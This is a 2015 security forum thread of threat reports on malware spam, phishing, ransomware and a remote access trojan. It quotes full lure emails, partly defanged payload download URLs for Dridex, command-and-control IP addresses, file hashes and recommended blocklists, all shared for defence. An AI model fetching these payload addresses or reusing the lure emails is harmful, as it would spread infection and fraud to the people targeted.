Current Virus total detections: 3/56* which is same malware although renamed as today’s Australia Post Track Advice Notification: Consignment RYR3602120 – fake PDF malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...
* https://www.virustotal.com/en/file/157158f46dc0a72c703f48d337b6f1ccd128e3f3c85ff955c435cf12f296f5a8/analysis/1426610474/
** http://myonlinesecurity.co.uk/australia-post-track-advice-notification-consignment-ryr3602120fake-pdf-malware/
- http://blog.dynamoo.com/2015/03/malware-spam-jp-morgan-access.html
18 Mar 2015 - "... Carrie L Tolstedt is a real executive... at Wells Fargo*. The lady in the picture is another Wells Fargo employee entirely**...."
* https://www.wellsfargo.com/about/corporate/executive_officers/tolstedt
** http://www.americanbanker.com/authors/jamie-moldafsky-1609.html?csite=fsm
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
:fear::fear: :mad:
AplusWebMaster
2015-03-19, 13:19
FYI...
Fake Fax SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/fax-from-4921154767199-pages-1-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "'Fax from +4921154767199 Pages: 1' pretending to come from faxtastic! <fax@ faxtastic .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
You have received a new fax. To view it, please open the attachment.
Did you know we now send? Visit www .faxtastic .co.uk for more details.
Regards,
faxtastic Support Team
19 March 2015 : 2015031714240625332.xls - Current Virus total detections: 2/57* | 2/57** at least one of these malicious macros is contacting meostore .net/js/bin.exe to download the dridex banking Trojan. (VirusTotal***). There will be other download locations... So far I am only seeing 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c5b83418c7fbe3e3799decce6162525b1ca73eeb8854e5e599c4830bb54de9a4/analysis/1426754021/
** https://www.virustotal.com/en/file/98b1ae63a582fbb998959648c7fdee5be9ce7a4341c4bb474fe7b64997197784/analysis/1426753958/
*** https://www.virustotal.com/en/file/0eecb2e26fe9adbd66d4c498a0e752453872d2bf4ee25654048dc7a89f708b89/analysis/1426753820/
... Behavioural information
TCP connections
95.163.121.200: https://www.virustotal.com/en/ip-address/95.163.121.200/information/
___
Fake 'Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/marflow-your-sales-order-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "'Marflow Your Sales Order' pretending to come from sales@ marflow .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Your order acknowledgment is attached.
Please check carefully and advise us of any issues.
Best regards
Marflow
19 March 2015 : 611866.xls - Current Virus total detections: 2/57* | 2/57**
Although these are -different- macros to the earlier XLS spam macro run today, they appear to be contacting the -same- sites and downloading the same dridex malware Fax from +4921154767199 Pages: 1 – word doc or excel xls spreadsheet malware:
> http://myonlinesecurity.co.uk/fax-from-4921154767199-pages-1-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ac3885b9c56fd0c55dbfc92423a32952cafc6aaf1117d4eb018c963c124696e2/analysis/1426760344/
** https://www.virustotal.com/en/file/89ca72fa4dcddefbad0d90abbbd55c29e91ddc149ff6a057ca9f280e5cf46733/analysis/1426760388/
- http://blog.dynamoo.com/2015/03/malware-spam-salesmarflowcouk-your.html
19 March 2015
"... Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201 "
___
Fake Solicitors Debt SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
19 Mar 2015 - "This spam has a malicious attachment.
Date: 19 March 2015 at 12:52
Subject: Aspiring Solicitors Debt Collection
Aspiring Solicitors
Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.
You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.
Court Fees GBP 245.00
Solicitors Costs GBP 750.00
Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings...
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5..."
- http://myonlinesecurity.co.uk/aspiring-solicitors-debt-collection-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Aspiring-Solicitors-Debt-Collection.png
> https://www.virustotal.com/en/file/01bbd36cb0d0807a7ae036e9cd51c08aba5db48b66edf6d18791b69d1377a326/analysis/1426773553/
0 / 57
___
More Fake Invoice SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-id77f5451-in-attachment-word-doc-or-excel-xls-spreadsheet-malware/
19 Mar 2015 - "A whole series of emails with multiple subjects all having random numbers including:
Invoice ID:77f5451 in attachment
Your February Invoice ID:58a0834
These all come from multiple random addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The emails all have a completely-empty body.
19 March2015 : 58a0834.doc - Current Virus total detections: 0/57*
These look very similar to Aspiring Solicitors Debt Collection – word doc or excel xls spreadsheet malware:
> http://myonlinesecurity.co.uk/aspiring-solicitors-debt-collection-word-doc-or-excel-xls-spreadsheet-malware/
The same warning must apply and opening the malicious doc will infect you, even with macros disabled... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0e644b56427fb7462325b27b2367a4efe5f5734b3929c5d8ecfe20c0be21bf7e/analysis/1426778947/
0 / 57
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-id987654321-in.html
19 Mar 2015 - "... contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the -same- as the one used in this attack*..."
* http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
___
BoA Phish seeks personal data ...
- https://blog.malwarebytes.org/fraud-scam/2015/03/bank-of-america-phish-seeks-personal-data-bonanza/
Mar 19, 2015 - "If you’re a Bank of America customer you’ll want to avoid this phishing URL, located at 74.208.43.206 /html/E-Alert(Dot)html:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/boaph1.jpg
The site says:
"We need you to verify your account information for your online banking to be re-activated"
...and asks visitors to “click-the-download-button to receive your verification file”, then open it in their browser. As it turns out, “downloading the file” means “visit another webpage”:
Alertfb .pw /site/IrregularActivityFile(dot)html
The above site takes those eager to hand over personal information to the cleaners – there’s a wide variety of data harvested including Online ID and passcode, name, DOB, social security number, drivers license number, email address and password. That’s not all – there’s also 3 security questions and payment information / address to complete the carefully laid out steps... That’s a lot of info to hand over to scammers, and anybody who thinks they may have been caught by something similar to the above should contact their bank immediately. Some of the images on the website are apparently broken and none of the URLs look remotely like legitimate BoA URLs so that will hopefully deter a few would be banking disasters. While in the process of drafting this blog we’ve noticed the second site which asks for the bulk of the banking customer information is being -flagged- by Chrome for phishing, so hopefully that will help to reduce the potential victim pool still further. We’ll update the post as we test with different browsers, but for now watch what you click and be very cautious should you see either of the two URLs pop up in an unsolicited email…"
74.208.43.206: https://www.virustotal.com/en/ip-address/74.208.43.206/information/
104.219.184.113: https://www.virustotal.com/en/ip-address/104.219.184.113/information/
:fear: :mad:
AplusWebMaster
2015-03-20, 12:41
FYI...
CryptoWall 3.0 Ransomware partners with FAREIT spyware
- http://blog.trendmicro.com/trendlabs-security-intelligence/cryptowall-3-0-ransomware-partners-with-fareit-spyware/
Mar 19, 2015 - "... CryptoWall 3.0 arrives via spammed emails, using a JavaScript attachment. In the screenshot below*, the attachment poses as a resume inside an archive file. A .JS file (detected as JS_DLOADR.JBNZ, JS_DLOAD.CRYP, and JS_DLOADE.XXPU) will be extracted from the file, which is peculiar as it is as the file extensions often associated with resumes are .DOC, .PDF and .RTF.
* http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-11.jpg
... it will connect to two URLs to download “.JPG” files. But don’t be fooled by the extension — this is an old technique which may bypass poorly designed intrusion detection systems (IDS) by disguising malware as an image file... The JS file will execute the files after a successful download... TROJ_CRYPWAL.YOI will create a new instance of explorer.exe to gain local admin privilege, provided that the victim has admin rights — which is a common setup. Using a legitimate system process like explorer.exe could help the malware bypass scanners that use whitelisting. It will create a new instance of svchost.exe with -k netsvcs arguments which will perform the C&C communication and file encryption. This also gives the malware system service privileges... After receiving the RSA public key for file encryption from its C&C server, as the private key to be used for decryption is stored in the server, it will start encrypting the files with certain file extensions. Targeted files include documents, databases, emails, images, audio, video, and source codes. After encrypting a file using RSA-2048 encryption algorithm, it will append a random file extension to the original file name, and add the “HELP_DECRYPT” files to the directory affected. After its encryption routine, it will open the “HELP_DECRYPT” files to show the victim the dreaded ransom note:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-5.jpg
TSPY_FAREIT.YOI is executed alongside TROJ_CRYPWAL.YOI. While the victim is distracted by CryptoWall’s -extortion- the spyware will steal credentials stored in the system’s FTP clients, web browsers, email clients and even Bitcoin wallets... this is the first time we’ve seen crypto-ransomware team up with spyware. This just shows that the cybercriminals are getting greedier. They are no longer content with the revenue they get from their ransom, around US$500 — which -doubles- after a certain period of time has lapsed:
Ransom fee increases:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-6.jpg
... the threat actors are using an “old business model” as their back-up plan. Even if the victim refuses to pay the Bitcoin ransom, the cybercriminals can still get money by stealing existing Bitcoin wallets and by selling/using any stolen information. Based on feedback from the Smart Protection Network, the region most affected by CryptoWall 3.0 is Australia/New Zealand, followed by North America and Europe:
Regions affected by CryptoWall 3.0:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/CrypWall3-7.jpg
Users can protect their important data by regularly backing up their files. They can implement the 3-2-1 rule** for their files. Of course, for threats like crypto-ransomware and spyware, other safety practices are advised... users should -never- open attachments from unknown or unverified senders... ignore or -delete- from unknown senders..."
** http://blog.trendmicro.com/trendlabs-security-intelligence/world-backup-day-the-3-2-1-rule/
"... The accepted rule for backup best practices is the three-two-one rule. It can be summarized as: if you’re backing something up, you should have:
• At least three copies,
• In two different formats,
• with one of those copies off-site..."
:fear::fear: :mad:
AplusWebMaster
2015-03-20, 13:53
FYI...
Something evil on 85.143.216.102 and 94.242.205.101
- http://blog.dynamoo.com/2015/03/something-evil-on-85143216102-and.html
20 Mar 2015 - "... I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report*] being reached via 85.143.216.102 (AirISP, Russia) [VT report**]. Whatever it is, it is using subdomains from -hijacked- GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs... For practical purposes though I recommend you block traffic to the IPs rather than the domains.
Recommended blocklist:
85.143.216.102
94.242.205.101 "
* https://www.virustotal.com/en/ip-address/94.242.205.101/information/
** https://www.virustotal.com/en/ip-address/85.143.216.102/information/
1] http://pastebin.com/MWhk2qy8
2] http://pastebin.com/XdBKFtP8
___
Nuclear EK leverages Flash CVE-2015-0336
- https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/
Mar 19, 2015 - "... Malwarebytes Anti-Exploit* users are already protected against this threat... Adobe has confirmed that a variant of CVE-2015-0336 is being exploited 'in-the-wild'. CVE-2015-0336 was -resolved- in Flash Player 17.0.0.134 (see APSB15-05**)..."
* http://www.malwarebytes.org/antiexploit/
** https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0336 - 9.3 (HIGH)
___
How Victims Are Redirected to IT Support Scareware Sites
- https://isc.sans.edu/diary.html?storyid=19487
2015-03-20 - "In the classic version of tech support scams, the fake technician initiated an unsolicited phone call to the victim. Now the awareness for this scheme has increased, scammers shifted tactics. Their latest approaches involve convincing the potential victim to be the one calling the impostor. I've seen this accomplished in two ways:
• Scammers use bots to respond to Twitter users who mention PC problems or malware. The bots search for the appropriate keyboards and send messages that include a phone number of a tech support firm. I described this approach when exploring how scammers prescreen potential victims.
• Scammers set up scareware websites that are designed to fool people into thinking their PC is infected, compelling visitors to call the fake tech support organization... Let’s take a look a domain redirection variation of this scam below.
In the following example, the victim visited a link that was once associated with a legitimate website: 25yearsofprogramming .com. The owner of the domain appears to have allowed its registration to expire in early 2014. At that point, the domain was transferred to Name Management Group, according to DomainTools Whois records... Name Management Group seems to own over 13,000 domains (according to DomainTools Whois records), including numerous domains that DomainTools classifies as -malicious- ... (Don't visit these domains.)
- Landing on the Fake Malware Warning Site:
Visiting the once-legitimate URL a few days ago landed the victim on a scammy scareware page, designed to persuade the person to contact "Microsoft Certified Live Technicians" at the specified toll-free phone number. The site employed social engineering techniques employed by rogue antivirus tools. Such schemes present victims with fake virus warnings, designed to scare people into submission. The site in our example also played an auditory message, exclaiming:
"This is a Windows system warning! This is a Windows system warning! If you are hearing this warning message, the security of your Windows system has been compromised. Your Windows computer and data might be at risk because of adwares, spywares and malicious pop-ups! Your bank details, credit card information, email accounts, Facebook account, private photos and other sensitive files may be compromised. Please call the number mentioned now to resolve this issue."
To see and hear what the victim experienced... watch it on YouTube:
- https://www.youtube.com/watch?v=Pe2HLvOGEaA
... The companies behind these servers, as well as the firm presently controlling 25yearsofprogramming .com are probably receiving referral fees for role in the redirection scheme. There's much to explore regarding the domain names, systems and companies involved in the schemes outlined above... If you decide to explore any of these systems, do so from an isolated laboratory environment. Also, if you encounter a tech support scam, please register it with our database of such incidents:
- https://isc.sans.edu/reportfakecall.html "
(More detail at the isc diary URL at the top of this post.)
___
Who Develops Code for IT Support Scareware Websites?
- https://isc.sans.edu/diary.html?storyid=19489
2015-03-20
- https://isc.sans.edu/diaryimages/images/yourtechsupport-l3-large.png
___
The Manipulative Nature and Mechanics of Visitor Survey Scams
- https://zeltser.com/visitor-survey-scams/
March 18, 2015
- Lenny Zeltser
___
Fake pictures SPAM - malware
- https://www.virustotal.com/en/file/bd43c4d11401a46c9e46226eb6115378ee7ba8a9ea99e07c14da5f7f56af2527/analysis/1426864158/
20 Mar 2015 - "'American Wholesale Pictures' pretending to come from Tod <tod@ awrco .com> with a zip attachment is another one from the current bot runs... The email looks like:
Hi,
Sorry for the delay I just received these this morning.
Here are the pictures of the panels that you requested.
Thank you,
Adam
Office
Manager
American Wholesale Co.
Phone: 216-426-8882
Fax: 216-426-8883 ...
20 March 2015: 084-16475-4999.zip: Extracts to: img.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bd43c4d11401a46c9e46226eb6115378ee7ba8a9ea99e07c14da5f7f56af2527/analysis/1426864158/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
:fear: :mad:
AplusWebMaster
2015-03-23, 17:40
FYI...
Fake 'Statement' SPAM – PDF malware
- http://myonlinesecurity.co.uk/retailer-statement-for-fake-pdf-malware/
23 Mar 2015 - "'Retailer Statement for 19745' (random numbers) pretending to come from user <tod@ awrco .com> with a zip attachment is another one from the current bot runs... The email which has random attachment numbers looks like:
HI,
document as an attachment
23 March 2015 : 587-19745-2563.zip: Extracts to: document.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/617af029221f990c321ec39b4ff6e9bbe68651961ca4867882b9bfcfce18d2e0/analysis/1427123035/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
217.19.14.37: https://www.virustotal.com/en/ip-address/217.19.14.37/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'approval' SPAM - PDF malware
- http://myonlinesecurity.co.uk/123111-approve-niemann-foods-laurie-liggett-fake-pdf-malware/
23 Mar 2015 - "'12/31(1/1) approve' pretending to come from Laurie Liggett <lliggett@ niemannfoods .com> with a zip attachment is another one from the current bot runs... The email looks like:
Your message is ready to be sent with the following file attachment.
Laurie Liggett
Buying Office Administrator
Niemann Foods,
Inc.
23 March 2015: 705-87633#5042.zip: Extracts to: pic.exe
Current Virus total detections: 1/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/45ff9d6bd81b85206bf349863573576f7953ae9617edc1bd699b61048c639308/analysis/1427128006/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
94.126.48.158: https://www.virustotal.com/en/ip-address/94.126.48.158/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
:fear: :mad:
AplusWebMaster
2015-03-24, 11:33
FYI...
Fake Resume SPAM - JavaScript malware
- http://myonlinesecurity.co.uk/resume-bobbie-rocha-fake-pdf-malware/
24 Mar 2015 - "'Resume Bobbie Rocha' pretending to come from Bobbie <BobbieRocha@ businesscommerce .com> with a zip attachment is another one from the current bot runs... The email looks like:
My name is Bobbie Rocha, attached is my resume.
I look forward to hearing back from you.
Thank you,
Bobbie
24 March 2015: Resume Bobbie Rocha.zip: Extracts to: Resume Bobbie Rocha.js
Current Virus total detections: 12/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d93d0d04c0eae52185bbf6c5a8b237950217447ef84fe3b8a76c230d1ef528b8/analysis/1427180393/
___
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/mary-watkins-ely-design-group-invoice-word-doc-or-excel-xls-spreadsheet-malware/
24 Mar 2015 - "'Mary Watkins Ely Design Group Invoice' pretending to come from Mary Watkins <mary@ elydesigngroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi,
As promised!
Mary Watkins
Office Manager
Ely Design Group
25 February 2015 : S22C-6e15031710060.doc - Current Virus total detections: 2/55* | 2/55**
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8/analysis/1427186619/
** https://www.virustotal.com/en/file/2c8b21ea9739e9510e3ccc89523b6702397ab0ba48b755a067e61f7e1c96844e/analysis/1427186436/
- http://blog.dynamoo.com/2015/03/malware-spam-mary-watkins.html
24 Mar 2015 - "This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicious attachment:
From: Mary Watkins [mary@ elydesigngroup .co.uk]
Date: 24 March 2015 at 07:23
Subject: Invoice
Hi,
As promised!
Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57* which contains this malicious macro which then downloads a component from the following location:
http ://dogordie .de/js/bin.exe
The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57**.
Automated analysis tools... indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan."
* https://www.virustotal.com/en/file/7ac6d989c14097f9edc5d8f46e0db43b24bacf91a6d24cbbd61832c0cbba3be8/analysis/1427189692/
** https://www.virustotal.com/en/file/6d528c55249ef53676bbea5296e337dc19ee8043ff27c77767f5ebfddc1ca209/analysis/1427189707/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
dogordie .de: 81.169.145.156: https://www.virustotal.com/en/ip-address/81.169.145.156/information/
___
Fake 'Thank you' SPAM - PDF malware
- http://myonlinesecurity.co.uk/robinson-iga-project-thank-you-for-your-business-fake-pdf-malware/
24 Mar 2015 - "'Robinson IGA project Thank you for your business' pretending to come from user <elezaveta@ enewall .co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Thank-you-for-your-business.png
24 March 2015 : 23807905.zip: Extracts to: doc.exe - Current Virus total detections: 2/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3ad17cba2f1cd98cb0030011d3559e86474d9527afa210b656e79ca97b9c1d90/analysis/1427194478/
... Behavioural information
TCP connections
134.249.63.46: https://www.virustotal.com/en/ip-address/134.249.63.46/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
___
Recent Malware Outbreaks
- http://www.senderbase.org/static/malware/
Last Updated: 2015/03/24 10:59 UTC
Top Malware Senders
- http://www.senderbase.org/static/malware/#tab=1
Last Updated: 2015/03/24 10:03 UTC
___
Fake 'Payment To Skype' - PayPal phish...
- http://myonlinesecurity.co.uk/new-payment-to-skype-inc-paypal-phishing/
24 Mar 2015 - "'New Payment To Skype INC' pretending to come from Pay Pal <lordjohn74@ hotmail .co.uk> is one of the latest phish attempts to steal your Paypal account and your Bank, credit card and personal details... don’t click-the-link in the email...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/New-Payment-to-Skype-Inc.png
... the link (takes you to) a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-1-1024x500.png
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/AFRIKA_Paypal-login-2.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
The RATS are free...
- http://www.symantec.com/connect/fr/blogs/nanocore-another-rat-tries-make-it-out-gutter
23 Mar 2015 - "... Remote access Trojans, otherwise known as RATs, are nothing new and they frequently grab their fair share of security-related news headlines. Commonly used in both targeted and non-targeted attacks, and even on mobile devices, RATs are a popular tool among cybercriminals; whether for financial gain, espionage, or for something more creepy. Some RATs are more common than others, such as the infamous Blackshades (W32.Shadesrat), PlugX (Backdoor.Korplug), Poison Ivy (Backdoor.Darkmoon), or many others that have made a name for themselves in the cybercriminal underground. However, every once in a while a new RAT tries to emerge out of the unknown and “make it” just like its more common cousins... human nature’s love of cheap or, better yet, free stuff is helping this RAT in its efforts to hit the big time but potentially at a cost to the developer... RATs sold on underground forums can vary in price, ranging anywhere from US$25 to $250. In recent years the security community has seen plenty of new RATs come and go but where things always get dirty is when a cracked version of a RAT is leaked online for free. When this happens, usage of the RAT increases; cybercriminals are (arguably) human after all and love to get things for free... It seems that every time the author tries to develop and improve NanoCore, one of the customers invariably ends up -leaking- a copy of it for free. This surely has to be a major disincentive for the original developer but they seem to possess endless optimism and persist to create new versions with enhanced capabilities, maybe in the hope that eventually enough customers will pay...
Top ten countries affected by Trojan.Nancrat (Jan 2014 to March 2015):
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Figure3_1.png
... The RAT is being distributed through malicious emails... targeted emails are being sent to energy companies in Asia and the Middle East and the cybercriminals behind the attack are spoofing the email address of a legitimate oil company in South Korea. Attached to the email is a malicious RTF file that exploits the Microsoft Windows Common Controls ActiveX Control Remote Code Execution Vulnerability (CVE-2012-0158*) and drops Trojan.Nancrat... The cracked versions of NanoCore are now not only available on the dark web but also on the visible web. That means it’s not just the more experienced cybercriminals who can easily access this malware for free, but also script kiddies eager to start their cybercriminal careers. The more the NanoCore malware is used and is visible on the underground, the higher the chances that one day it may end up just as well-known as some of the notorious RATs that have come before it..."
* http://www.securityfocus.com/bid/52911/references
___
Google warns of OS-trusted but unauthorised digital certificates
Maintaining digital certificate security
- http://googleonlinesecurity.blogspot.co.uk/2015/03/maintaining-digital-certificate-security.html
March 23, 2015 - "... Chrome users do not need to take any action to be protected by the CRLSet updates. We have no indication of abuse and we are not suggesting that people change passwords or take other action. At this time we are considering what further actions are appropriate..."
Firefox 37 ...
Revoking Trust in one CNNIC Intermediate Certificate
- https://blog.mozilla.org/security/2015/03/23/revoking-trust-in-one-cnnic-intermediate-certificate/
Mar 23, 2015 - "... to protect our users we are adding the revoked certificate to OneCRL, our mechanism for directly sending revocation information to Firefox which will be shipping in Firefox 37..."
- https://wiki.mozilla.org/Releases#Upcoming_Releases
"... Firefox 37... RELEASE week of March 31, 2015."
:fear::fear: :mad:
AplusWebMaster
2015-03-25, 15:28
FYI...
Fake 'Payment' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/payment-1142-word-doc-or-excel-xls-spreadsheet-malware/
25 Mar 2015 - "'Payment 1142' pretending to come from James Dudley <James.Dudley@ hitec .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Payment sheet attached.
James
T 01353 624023
F 01353 624043
E james.dudley@ hitec .co.uk
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
25 February 2015 : Payment 1142.doc - Current Virus total detections: 2/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b4470a74c07438336eee8450a839410971570aeb57334d19e7053a31c459d3a2/analysis/1427270267/
- http://blog.dynamoo.com/2015/03/malware-spam-james-dudley.html
25 Mar 2015 - "This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.
From: James Dudley [James.Dudley@ hitec .co.uk]
Date: 25 March 2015 at 09:38
Subject: Payment 1142
Payment sheet attached.
James
T 01353 624023
F 01353 624043
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57*. It contains this malicious macro... which attempts to download a component from:
http ://madasi.homepage .t-online .de/dbcfg/32.exe
..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57**. Automated analysis of this binary is pending, but is so far inconclusive...
MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf
UPDATE: this interesting new tool from Payload Security[1] gives some insight as to what the malware does. In particular, it phones home to:
50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)
Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24 "
* https://www.virustotal.com/en/file/4ad0b509b232dc0fc1704552de614849f1ddc63dbd5c9f3cf9fc2490c6abcba8/analysis/1427293393/
** https://www.virustotal.com/en/file/7bcb0abcfbea20ecfe31d8dd65146b8b1ffd0d81479d11dc329b2f99e263bd78/analysis/1427293399/
1] https://www.hybrid-analysis.com/sample/7bcb0abcfbea20ecfe31d8dd65146b8b1ffd0d81479d11dc329b2f99e263bd78?environmentId=1
___
Fake Citi SPAM - PDF malware
- http://myonlinesecurity.co.uk/citi-merchant-services-statements-fake-pdf-malware/
25 Mar 2015 - "'Citi Merchant Services statements – 05721901-6080' ( random numbers) pretending to come from user <noreply@ efsnb-archive .com> with a zip attachment is another one from the current bot runs... The email looks like:
Attached is your Merchant Statement. It is secured so that only an
authorized recipient can open it. To open, click on the attachment.
In order to view
the attached PDF file, you need Adobe Acrobat Reader Version 8.0
installed.
Click on the following link:
<http ://www.adobe .com/products/acrobat/readstep2.html> to complete a free
install or re-install if you have an older version.
Visit Microsoft’s self
help website at www .microsoft .com or contact your ISP if you do not
receive the attachment.
Delivering your statements directly to your desktop is just one
more way we’ve increased the speed of business. Thanks again for
choosing CTS Holdings, LLC as your merchant processor. CTS Holdings, LLC, you can
count on us!
This is a post-only mailing. Please do not respond. To change
preferences please contact Customer Service at 1-800-238-7675.
25 March 2015 : random zip name : Extracts to: Merchant.exe - Current Virus total detections: 6/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a003f8cedb6b5657883347626c9274bbbb5425ab46054045279c92edb44da240/analysis/1427293896/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
46.249.3.66: https://www.virustotal.com/en/ip-address/46.249.3.66/information/
